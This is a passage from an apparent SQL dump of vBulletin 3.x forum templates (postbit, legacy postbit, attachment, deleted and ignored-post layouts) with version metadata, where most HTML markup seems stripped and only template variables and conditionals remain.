    \") : (\"\")).\"\r\n
    \r\n $vbphrase[posts]: $post[posts]\r\n
    \r\n $template_hook[postbit_userinfo_right_after_posts]\r\n \".(($show[\'infraction\']) ? (\"
    $vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])
    \") : (\"\")).\"\r\n \".(($show[\'reputation\']) ? (\"\".(($show[\'reppower\']) ? (\"$vbphrase[reppower]: $post[reppower] \") : (\"\")).\"
    $post[reputationdisplay]
    \") : (\"\")).\"\r\n $template_hook[postbit_userinfo_right]\r\n
    $post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n \") : (\"\r\n \r\n \")).\" \r\n \r\n\r\n $template_hook[postbit_messagearea_start]\r\n\r\n \".(($show[\'messageicon\'] OR $post[\'title\']) ? (\"\r\n \r\n
    \r\n \".(($show[\'messageicon\']) ? (\"\\\"$post[icontitle]\\\"\") : (\"\")).\"\r\n \".(($post[\'title\']) ? (\"$post[title]\") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
    \r\n $ad_location[ad_showthread_firstpost_start]\r\n $post[message]\r\n
    \r\n \r\n\r\n \".(($show[\'attachments\']) ? (\"\r\n \r\n
    \r\n\r\n \".(($show[\'thumbnailattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_thumbnails]\r\n
    \r\n $post[thumbnailattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_images]\r\n
    \r\n $post[imageattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachmentlink\']) ? (\"\r\n
    \r\n $vbphrase[attached_images]\r\n \r\n $post[imageattachmentlinks]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'otherattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_files]\r\n \r\n $post[otherattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'moderatedattachment\']) ? (\"\r\n
    \r\n $vbphrase[attachments_pending_approval]\r\n \r\n $post[moderatedattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[postbit_signature_start]\r\n $ad_location[ad_showthread_firstpost_sig]\r\n\r\n \".(($post[\'signature\']) ? (\"\r\n \r\n
    \r\n __________________
    \r\n $post[signature]\r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[postbit_signature_end]\r\n\r\n \".(($show[\'postedited\']) ? (\"\r\n \r\n
    \r\n
    \r\n \r\n \".(($show[\'postedithistory\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[last_edited_link_by_x_on_y_at_z_postid]\", \"$post[edit_username]\", \"$post[edit_date]\", \"$post[edit_time]\", \"posthistory.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"p=$post[postid]\") . \"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[last_edited_by_x_on_y_at_z]\", \"$post[edit_username]\", \"$post[edit_date]\", \"$post[edit_time]\") . \"\r\n \")).\"\r\n \".(($post[\'edit_reason\']) ? (\"\r\n $vbphrase[reason]: $post[edit_reason]\r\n \") : (\"\")).\"\r\n \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \r\n \".(($post[\'editlink\']) ? (\"\r\n \\\"$vbphrase[loading_editor_please_wait]\\\"\r\n \\\"$vbphrase[edit_delete_message]\\\"\r\n \") : (\"\")).\"\r\n \".(($post[\'forwardlink\']) ? (\"\r\n \\\"$vbphrase[forward_message]\\\"\r\n \") : (\"\")).\"\r\n \".(($post[\'replylink\']) ? (\"\r\n \\\"$vbphrase[reply_with_quote]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'multiquote_post\']) ? (\"\r\n \\\"$vbphrase[multi_quote_this_message]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'quickreply\'] AND !$show[\'threadedmode\']) ? (\"\r\n \\\"$vbphrase[quick_reply_to_this_message]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'moderated\']) ? (\"\r\n \\\"$vbphrase[moderated_post]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'spam\']) ? (\"\r\n \\\"$vbphrase[spam_post]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'deletedpost\']) ? (\"\r\n \".(($show[\'managepost\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=managepost&p=$post[postid]\\\">\\\"$vbphrase[manage]\\\"\r\n \") : (\"\r\n \\\"$vbphrase[deleted_post]\\\"\r\n \")).\"\r\n \") : (\"\")).\"\r\n \".(($show[\'redcard\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=view&p=$post[postid]\\\">\\\"$vbphrase[received_infraction]\\\"\r\n \") : (\"\r\n \".(($show[\'yellowcard\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=view&p=$post[postid]\\\">\\\"$vbphrase[received_warning]\\\"\r\n \") : (\"\")).\"\r\n \")).\"\r\n $template_hook[postbit_controls]\r\n \r\n
    \r\n\r\n \r\n\r\n
    \r\n$template_hook[postbit_end]\r\n\r\n\".(($show[\'profile\']) ? (\" \r\n\r\n\r\n\r\n\") : (\"\")).\"', '$template_hook[postbit_start]\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n
    \r\n
    \r\n  \r\n #$post[postcount]  \r\n \r\n \"<phrase$vbphrase[add_to_xs_reputation]\" border=\"0\" />\r\n  \r\n \r\n \"<phrase$vbphrase[add_infraction_for_x]\" border=\"0\" />  \r\n \"$vbphrase[report_bad_post]\"  \r\n $post[iplogged]\r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n \r\n \"$post[statustitle]\"\r\n \r\n $post[postdate], $post[posttime]\r\n \r\n $vbphrase[x_until_y]\r\n \r\n $post[firstnewinsert]\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"<phrase$vbphrase[xs_avatar]\" border=\"0\" />\r\n\r\n
    \r\n \r\n $post[musername]\r\n $post[onlinestatus]\r\n \r\n \r\n $post[musername]\r\n \r\n
    \r\n\r\n
    $post[usertitle]
    \r\n
    $post[rank]
    \r\n $template_hook[postbit_userinfo_left]\r\n\r\n
     \r\n\r\n
    \r\n
    $vbphrase[join_date]: $post[joindate]
    \r\n
    $vbphrase[location_perm]: $post[field2]
    \r\n
    $vbphrase[age]: $post[age]
    \r\n
    \r\n $vbphrase[posts]: $post[posts]\r\n
    \r\n $template_hook[postbit_userinfo_right_after_posts]\r\n
    $vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])
    \r\n $vbphrase[reppower]: $post[reppower]
    $post[reputationdisplay]
    \r\n $template_hook[postbit_userinfo_right]\r\n
    $post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n\r\n $template_hook[postbit_messagearea_start]\r\n\r\n \r\n \r\n
    \r\n \"$post[icontitle]\"\r\n $post[title]\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n $ad_location[ad_showthread_firstpost_start]\r\n $post[message]\r\n
    \r\n \r\n\r\n \r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_thumbnails]\r\n
    \r\n $post[thumbnailattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_images]\r\n
    \r\n $post[imageattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_images]\r\n \r\n $post[imageattachmentlinks]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_files]\r\n \r\n $post[otherattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attachments_pending_approval]\r\n \r\n $post[moderatedattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n $template_hook[postbit_signature_start]\r\n $ad_location[ad_showthread_firstpost_sig]\r\n\r\n \r\n \r\n
    \r\n __________________
    \r\n $post[signature]\r\n
    \r\n \r\n
    \r\n\r\n $template_hook[postbit_signature_end]\r\n\r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n $vbphrase[last_edited_link_by_x_on_y_at_z_postid]\r\n \r\n $vbphrase[last_edited_by_x_on_y_at_z]\r\n \r\n \r\n $vbphrase[reason]: $post[edit_reason]\r\n \r\n \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n \r\n \r\n \"$vbphrase[loading_editor_please_wait]\"\r\n \"$vbphrase[edit_delete_message]\"\r\n \r\n \r\n \"$vbphrase[forward_message]\"\r\n \r\n \r\n reply_smallquote.gif\" alt=\"$vbphrase[reply_with_quote]\" border=\"0\" />\r\n \r\n \r\n onoff.gif\" alt=\"$vbphrase[multi_quote_this_message]\" border=\"0\" id=\"mq_$post[postid]\" />\r\n \r\n \r\n \"$vbphrase[quick_reply_to_this_message]\"\r\n \r\n \r\n \"$vbphrase[moderated_post]\"\r\n \r\n \r\n \"$vbphrase[spam_post]\"\r\n \r\n \r\n \r\n \"$vbphrase[manage]\"\r\n \r\n \"$vbphrase[deleted_post]\"\r\n \r\n \r\n \r\n \"$vbphrase[received_infraction]\"\r\n \r\n \r\n \"$vbphrase[received_warning]\"\r\n \r\n \r\n $template_hook[postbit_controls]\r\n \r\n
    \r\n\r\n \r\n\r\n
    \r\n$template_hook[postbit_end]\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[postbit_user_popup]\r\n
    $post[username]
    $vbphrase[view_public_profile]
    $vbphrase[send_private_message_to_x]
    $vbphrase[send_email_to_x]
    $vbphrase[visit_xs_homepage]
    $vbphrase[find_all_posts_by_x]
    $vbphrase[add_x_to_contacts]
    \r\n
    \r\n\r\n
    ', 'template', 1280350744, 'vBulletin Solutions', '3.8.7 Beta 1', 'vbulletin'), (1515, -1, 'postbit_attachment', '\r\n \\\"\"\r\n session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\"\".(($show[\'newwindow\']) ? (\" target=\\\"_blank\\\"\") : (\"\")).\">$attachment[filename] ($attachment[filesize]\".(($show[\'views\']) ? (\", \" . construct_phrase(\"$vbphrase[x_views]\", \"$attachment[counter]\") . \"\") : (\"\")).\")\r\n', '\r\n \"<phrase$vbphrase[file_type_x]\" width=\"16\" height=\"16\" border=\"0\" style=\"vertical-align:baseline\" />\r\n target=\"_blank\"
    >$attachment[filename] ($attachment[filesize], $vbphrase[x_views])\r\n', 'template', 1219831366, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1516, -1, 'postbit_attachmentimage', 'session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&stc=1&d=$attachment[dateline]\\\" border=\\\"0\\\" alt=\\\"\\\" /> ', '\"\" ', 'template', 1105654461, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'), (1517, -1, 'postbit_attachmentmoderated', '\r\n \\\"\"\r\n \".(($show[\'modattachmentlink\']) ? (\"session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\"\".(($show[\'newwindow\']) ? (\" target=\\\"_blank\\\"\") : (\"\")).\">$attachment[filename] ($attachment[filesize])\") : (\"$attachment[filename]\")).\"\r\n', '\r\n \"<phrase$vbphrase[file_type_x]\" width=\"16\" height=\"16\" border=\"0\" style=\"vertical-align:baseline\" />\r\n target=\"_blank\">$attachment[filename] ($attachment[filesize])$attachment[filename]
    \r\n', 'template', 1151091065, 'vBulletin Solutions', '3.6.0 Beta 4', 'vbulletin'), (1518, -1, 'postbit_attachmentthumbnail', '\".(($show[\'cangetattachment\']) ? (\"\r\nsession->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\" rel=\\\"Lightbox_$post[postid]\\\" id=\\\"attachment$attachment[attachmentid]\\\"\".(($show[\'newwindow\']) ? (\" target=\\\"_blank\\\"\") : (\"\")).\">session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&stc=1&thumb=1&d=$attachment[thumbnail_dateline]\\\" border=\\\"0\\\" alt=\\\"\" . construct_phrase(\"$vbphrase[image_larger_version_x_y_z]\", \"$attachment[filename]\", \"$attachment[counter]\", \"$attachment[filesize]\", \"$attachment[attachmentid]\") . \"\\\" />\r\n \".(($show[\'br\']) ? (\"

    \") : (\"\")).\"\r\n\") : (\"\r\nsession->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\" rel=\\\"nofollow\\\" id=\\\"attach$attachment[attachmentid]\\\">session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&stc=1&thumb=1&d=$attachment[thumbnail_dateline]\\\" border=\\\"0\\\" alt=\\\"$attachment[filename]\\\" />\r\n \".(($show[\'br\']) ? (\"

    \") : (\"\")).\"\r\n\")).\"', '\r\n target=\"_blank\">\"<phrase$vbphrase[image_larger_version_x_y_z]\" />\r\n 

    \r\n\r\n\"$attachment[filename]\"\r\n 

    \r\n', 'template', 1219929150, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1519, -1, 'postbit_automoderated', '
    \r\n
    \r\n
    \r\n \r\n
    \r\n $post[username]
    \r\n $vbphrase[post_has_been_automoderated] \r\n
    \r\n
    ', '
    \r\n
    \r\n
    \r\n \r\n
    \r\n $post[username]
    \r\n $vbphrase[post_has_been_automoderated] \r\n
    \r\n
    ', 'template', 1209557876, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1520, -1, 'postbit_deleted', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'viewpost\']) ? (\"session->vars[\'sessionurl\'] . \"p=$post[postid]\\\" target=\\\"_blank\\\" rel=\\\"nofollow\\\" onclick=\\\"return display_post($post[postid]);\\\">$vbphrase[view_post]\") : (\"\")).\"\r\n \\\"$post[statustitle]\\\"\r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\" $post[firstnewinsert]\r\n
    \r\n \".(($show[\'managepost\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'profile\']) ? (\"session->vars[\'sessionurl\'] . \"u=$post[userid]\\\">$post[musername]\") : (\"$post[musername]\")).\"\r\n
    \r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$post[del_userid]\", \"$post[del_username]\") . \"\r\n \".(($post[\'del_reason\']) ? (\"$vbphrase[reason]: $post[del_reason]\") : (\"\")).\"\r\n
    \r\n\r\n
    ', '\r\n$vbphrase[post_x]\">\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n $vbphrase[view_post]\r\n \"$post[statustitle]\"\r\n $post[postdate], $post[posttime] $post[firstnewinsert]\r\n
    \r\n \r\n $post[musername]$post[musername]\r\n
    \r\n\r\n
    \r\n $vbphrase[message_deleted_by_x]\r\n $vbphrase[reason]: $post[del_reason]\r\n
    \r\n\r\n
    ', 'template', 1183466945, 'vBulletin Solutions', '3.6.8', 'vbulletin'), (1521, -1, 'postbit_external', '
    $post[message]
    \r\n\r\n\".(($show[\'attachments\']) ? (\"\r\n
    \r\n
    \r\n\r\n \".(($show[\'thumbnailattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_thumbnails]\r\n
    \r\n $post[thumbnailattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_images]\r\n
    \r\n $post[imageattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachmentlink\']) ? (\"\r\n
    \r\n $vbphrase[attached_images]\r\n \r\n $post[imageattachmentlinks]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'otherattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_files]\r\n \r\n $post[otherattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n\") : (\"\")).\"', '
    $post[message]
    \r\n\r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_thumbnails]\r\n
    \r\n $post[thumbnailattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_images]\r\n
    \r\n $post[imageattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_images]\r\n \r\n $post[imageattachmentlinks]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[attached_files]\r\n \r\n $post[otherattachments]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    ', 'template', 1154367421, 'vBulletin Solutions', '3.6.0', 'vbulletin'), (1522, -1, 'postbit_ignore', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n session->vars[\'sessionurl\'] . \"p=$post[postid]\\\" target=\\\"_blank\\\" rel=\\\"nofollow\\\" onclick=\\\"return display_post($post[postid]);\\\">$vbphrase[view_post]\r\n \\\"$post[statustitle]\\\"\r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\" $post[firstnewinsert]\r\n
    \r\n \r\n session->vars[\'sessionurl\'] . \"u=$post[userid]\\\">$post[musername]\r\n
    \r\n \".(($show[\'moderated\']) ? (\"\r\n
    \\\"$vbphrase[moderated_post]\\\"
    \r\n \") : (\"\")).\"\r\n \".(($show[\'deletedpost\']) ? (\"\r\n
    \\\"$vbphrase[deleted_post]\\\"
    \r\n \") : (\"\")).\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_hidden_x_on_ignore_list]\", \"$post[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n
    \r\n\r\n
    ', '\r\n$vbphrase[post_x]\">\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \r\n \r\n \r\n $vbphrase[view_post]\r\n \"$post[statustitle]\"\r\n $post[postdate], $post[posttime] $post[firstnewinsert]\r\n
    \r\n \r\n $post[musername]\r\n
    \r\n \r\n
    \"$vbphrase[moderated_post]\"
    \r\n
    \r\n \r\n
    \"$vbphrase[deleted_post]\"
    \r\n
    \r\n
    \r\n $vbphrase[message_hidden_x_on_ignore_list]\r\n
    \r\n\r\n
    ', 'template', 1196095083, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1523, -1, 'postbit_ignore_global', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n session->vars[\'sessionurl\'] . \"p=$post[postid]\\\" target=\\\"_blank\\\" rel=\\\"nofollow\\\" onclick=\\\"return display_post($post[postid]);\\\">$vbphrase[view_post]\r\n \\\"$post[statustitle]\\\"\r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\" $post[firstnewinsert]\r\n
    \r\n session->vars[\'sessionurl\'] . \"u=$post[userid]\\\">$post[musername]\r\n
    \r\n \".(($show[\'moderated\']) ? (\"\r\n
    \\\"$vbphrase[moderated_post]\\\"
    \r\n \") : (\"\")).\"\r\n \".(($show[\'deletedpost\']) ? (\"\r\n
    \\\"$vbphrase[deleted_post]\\\"
    \r\n \") : (\"\")).\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[administrator_decided_x_quiet]\", \"$post[username]\") . \"\r\n
    \r\n\r\n
    ', '\r\n$vbphrase[post_x]\">\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n $vbphrase[view_post]\r\n \"$post[statustitle]\"\r\n $post[postdate], $post[posttime] $post[firstnewinsert]\r\n
    \r\n $post[musername]\r\n
    \r\n \r\n
    \"$vbphrase[moderated_post]\"
    \r\n
    \r\n \r\n
    \"$vbphrase[deleted_post]\"
    \r\n
    \r\n
    \r\n $vbphrase[administrator_decided_x_quiet]\r\n
    \r\n\r\n
    ', 'template', 1167175129, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1524, -1, 'postbit_ip', '\".(($show[\'ip\']) ? (\"\r\n $vbphrase[ip]: $post[ip]\r\n\") : (\"\r\n session->vars[\'sessionurl\'] . \"do=getip&p=$post[postid]\\\">\\\"$vbphrase[ip]\\\"\r\n\")).\"', '\r\n $vbphrase[ip]: $post[ip]\r\n\r\n \"$vbphrase[ip]\"\r\n', 'template', 1071580820, 'vBulletin Solutions', '', 'vbulletin'), (1525, -1, 'postbit_legacy', '$template_hook[postbit_start]\r\n\r\n\r\n \".(($show[\'announcement\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \r\n \")).\"\r\n\r\n\r\n \r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n\r\n\r\n \r\n \".(($show[\'moderated\']) ? (\"\r\n \r\n\r\n
    \r\n \\\"$post[statustitle]\\\"\r\n \" . construct_phrase(\"$vbphrase[x_until_y]\", \"$post[startdate]\", \"$post[enddate]\") . \"\r\n \r\n \r\n \\\"$post[statustitle]\\\"\r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\"\r\n $post[firstnewinsert]\r\n \r\n \r\n  \r\n \".(($show[\'postcount\']) ? (\"#session->vars[\'sessionurl\'] . \"p=$post[postid]&postcount=$post[postcount]\\\" target=\\\"new\\\" rel=\\\"nofollow\\\" id=\\\"postcount$post[postid]\\\" name=\\\"$post[postcount]\\\">$post[postcount]\") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n \".(($show[\'profile\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$post[userid]\\\">$post[musername]\r\n \r\n \") : (\"\r\n $post[musername]\r\n \")).\"\r\n
    \r\n\r\n \".(($post[\'usertitle\']) ? (\"
    $post[usertitle]
    \") : (\"\")).\"\r\n \".(($post[\'rank\']) ? (\"
    $post[rank]
    \") : (\"\")).\"\r\n $template_hook[postbit_userinfo_left]\r\n\r\n \".(($show[\'avatar\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n
    \r\n  
    \r\n \".(($post[\'joindate\']) ? (\"
    $vbphrase[join_date]: $post[joindate]
    \") : (\"\")).\"\r\n \".(($post[\'field2\']) ? (\"
    $vbphrase[location_perm]: $post[field2]
    \") : (\"\")).\"\r\n \".(($post[\'age\']) ? (\"
    $vbphrase[age]: $post[age]
    \") : (\"\")).\"\r\n
    \r\n $vbphrase[posts]: $post[posts]\r\n
    \r\n $template_hook[postbit_userinfo_right_after_posts]\r\n \".(($show[\'infraction\']) ? (\"
    $vbphrase[infractions]: $post[warnings]/$post[infractions] ($post[ipoints])
    \") : (\"\")).\"\r\n \".(($show[\'reputation\']) ? (\"\".(($show[\'reppower\']) ? (\"$vbphrase[reppower]: $post[reppower] \") : (\"\")).\"
    $post[reputationdisplay]
    \") : (\"\")).\"\r\n $template_hook[postbit_userinfo_right]\r\n
    $post[icqicon] $post[aimicon] $post[msnicon] $post[yahooicon] $post[skypeicon]
    \r\n
    \r\n\r\n
    \r\n \") : (\"\r\n \r\n \")).\"\r\n $template_hook[postbit_messagearea_start]\r\n \".(($show[\'messageicon\'] OR $post[\'title\']) ? (\"\r\n \r\n
    \r\n \".(($show[\'messageicon\']) ? (\"\\\"$post[icontitle]\\\"\") : (\"\")).\"\r\n \".(($post[\'title\']) ? (\"$post[title]\") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
    \r\n $ad_location[ad_showthread_firstpost_start]\r\n $post[message]\r\n
    \r\n \r\n\r\n \".(($show[\'attachments\']) ? (\"\r\n \r\n
    \r\n\r\n \".(($show[\'thumbnailattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_thumbnails]\r\n
    \r\n $post[thumbnailattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_images]\r\n
    \r\n $post[imageattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachmentlink\']) ? (\"\r\n
    \r\n $vbphrase[attached_images]\r\n \r\n $post[imageattachmentlinks]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'otherattachment\']) ? (\"\r\n
    \r\n $vbphrase[attached_files]\r\n \r\n $post[otherattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'moderatedattachment\']) ? (\"\r\n
    \r\n $vbphrase[attachments_pending_approval]\r\n \r\n $post[moderatedattachments]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[postbit_signature_start]\r\n $ad_location[ad_showthread_firstpost_sig]\r\n\r\n \".(($post[\'signature\']) ? (\"\r\n \r\n
    \r\n __________________
    \r\n $post[signature]\r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[postbit_signature_end]\r\n\r\n \".(($show[\'postedited\']) ? (\"\r\n \r\n
    \r\n
    \r\n \r\n \".(($show[\'postedithistory\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[last_edited_link_by_x_on_y_at_z_postid]\", \"$post[edit_username]\", \"$post[edit_date]\", \"$post[edit_time]\", \"posthistory.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"p=$post[postid]\") . \"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[last_edited_by_x_on_y_at_z]\", \"$post[edit_username]\", \"$post[edit_date]\", \"$post[edit_time]\") . \"\r\n \")).\"\r\n \".(($post[\'edit_reason\']) ? (\"\r\n $vbphrase[reason]: $post[edit_reason]\r\n \") : (\"\")).\"\r\n \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $post[onlinestatus]\r\n \".(($show[\'reputationlink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"p=$post[postid]\\\" rel=\\\"nofollow\\\" id=\\\"reputation_$post[postid]\\\">\\\"\"\r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \") : (\"\")).\"\r\n \".(($show[\'infractionlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=report&p=$post[postid]\\\" rel=\\\"nofollow\\\">\\\"\"\") : (\"\")).\"\r\n \".(($show[\'reportlink\']) ? (\"session->vars[\'sessionurl\'] . \"p=$post[postid]\\\" rel=\\\"nofollow\\\">\\\"$vbphrase[report_bad_post]\\\"\") : (\"\")).\"\r\n $post[iplogged]\r\n  \r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \".(($post[\'editlink\']) ? (\"\r\n \\\"$vbphrase[loading_editor_please_wait]\\\"\r\n \\\"$vbphrase[edit_delete_message]\\\"\r\n \") : (\"\")).\"\r\n \".(($post[\'forwardlink\']) ? (\"\r\n \\\"$vbphrase[forward_message]\\\"\r\n \") : (\"\")).\"\r\n \".(($post[\'replylink\']) ? (\"\r\n \\\"$vbphrase[reply_with_quote]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'multiquote_post\']) ? (\"\r\n \\\"$vbphrase[multi_quote_this_message]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'quickreply\'] AND !$show[\'threadedmode\']) ? (\"\r\n \\\"$vbphrase[quick_reply_to_this_message]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'moderated\']) ? (\"\r\n \\\"$vbphrase[moderated_post]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'spam\']) ? (\"\r\n \\\"$vbphrase[spam_post]\\\"\r\n \") : (\"\")).\"\r\n \".(($show[\'deletedpost\']) ? (\"\r\n \".(($show[\'managepost\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=managepost&p=$post[postid]\\\">\\\"$vbphrase[manage]\\\"\r\n \") : (\"\r\n \\\"$vbphrase[deleted_post]\\\"\r\n \")).\"\r\n \") : (\"\")).\"\r\n \".(($show[\'redcard\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=view&p=$post[postid]\\\">\\\"$vbphrase[received_infraction]\\\"\r\n \") : (\"\r\n \".(($show[\'yellowcard\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=view&p=$post[postid]\\\">\\\"$vbphrase[received_warning]\\\"\r\n \") : (\"\")).\"\r\n \")).\"\r\n $template_hook[postbit_controls]\r\n \r\n
